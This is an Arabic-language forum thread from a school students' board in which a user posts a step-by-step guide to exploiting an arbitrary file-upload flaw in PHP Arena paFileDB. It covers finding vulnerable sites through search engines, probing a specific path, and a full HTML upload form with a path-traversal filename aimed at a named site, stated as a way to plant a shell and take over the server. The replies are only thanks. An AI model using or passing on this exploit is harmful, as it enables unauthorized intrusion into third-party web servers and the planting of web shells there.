منتدى متوسطة شنينبة حسين ميلة
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى خاص بتلاميذ متوسطة شنينبة حسين(حي التوفير)

  • الرئيسية
  • البوابة
  • التسجيل
  • أحدث الصور
  • دخول

تعال تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB

2 مشترك

منتدى متوسطة شنينبة حسين ميلة :: الترفيه و الهوايات :: الكمبيوتر والأنترنت

اذهب الى الأسفل

تعال تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB Empty تعال تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB

مُساهمة من طرف mehdi_star_boy الجمعة أبريل 24, 2009 10:19 pm

((أرجوا عدم استخدام الثغرة في الحرام ألا هل بلغت اللهم اشهد))

شرح ثغرة
PHP Arena paFileDB
وأستغلالها.
~~~~~~~~~~~~~~
الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
~~~~~~~~~~~~~~~~
(البرامج المصابه)
PHP Arena paFileDB 1.1.3
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 3.1
أذهب إلى أي محرك بحث منثل جوجل
وأكتب أيا من البرامج السابقة مثلا:
PHP Arena paFileDB 3.1
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:

نضيف عليه هالوصلة:
includes/team/file.php

الأن ضع اللنك في المتصفح وأضغط أنتر:
إذا طلع لك هكذا
[ ] - [ ] - [ ]
يعني الموقع مصاب بالثغرة.
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/tea m/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
======================
مع مراعاة تغيير:
إلى الموقع المصاب.
و
777.php
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.
ويمكننا أستعراضه من هذا اللنك:
|`````````````|
I hope to be like everyone
و شكرا
Arrow
(`v`)mehdi_star_boy(`v`)
^^^^^^^^
^^^^
^^
^
^
M
E
H
D
I
^
^^
^^^^
^^^^^^^^
mehdi_star_boy
mehdi_star_boy
عضو متميز
عضو متميز

عدد الرسائل : 616
العمر : 28
الموقع : http://www.mehdistarboy.skyrock.com
Personalized field : نجم المنتدى
نقطة تميز: 340
نقاط : 773
تاريخ التسجيل : 02/04/2009

http://www.milano.arabstar.biz

الرجوع الى أعلى الصفحة اذهب الى الأسفل

تعال تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB Empty رد: تعال تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB

مُساهمة من طرف AYOUB الخميس أبريل 30, 2009 4:20 pm

merci(`v`)mehdi_star_boy(`v`)
^^^^^^^^
^^^^
^^
^
^
M
E
H
D
I
^
^^
^^^^
^^^^^^^^
AYOUB
AYOUB
Admin
Admin

عدد الرسائل : 2938
العمر : 30
الموقع : islalmayoub94.skyrock.com
Personalized field : نائب المدير العام
نقاط : 3353
تاريخ التسجيل : 10/09/2008

http://islamayoub94.skyrock.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

تعال تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB Empty رد: تعال تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB

مُساهمة من طرف mehdi_star_boy الخميس مايو 14, 2009 12:11 am

de rien
mehdi_star_boy
mehdi_star_boy
عضو متميز
عضو متميز

عدد الرسائل : 616
العمر : 28
الموقع : http://www.mehdistarboy.skyrock.com
Personalized field : نجم المنتدى
نقطة تميز: 340
نقاط : 773
تاريخ التسجيل : 02/04/2009

http://www.milano.arabstar.biz

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

منتدى متوسطة شنينبة حسين ميلة :: الترفيه و الهوايات :: الكمبيوتر والأنترنت

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى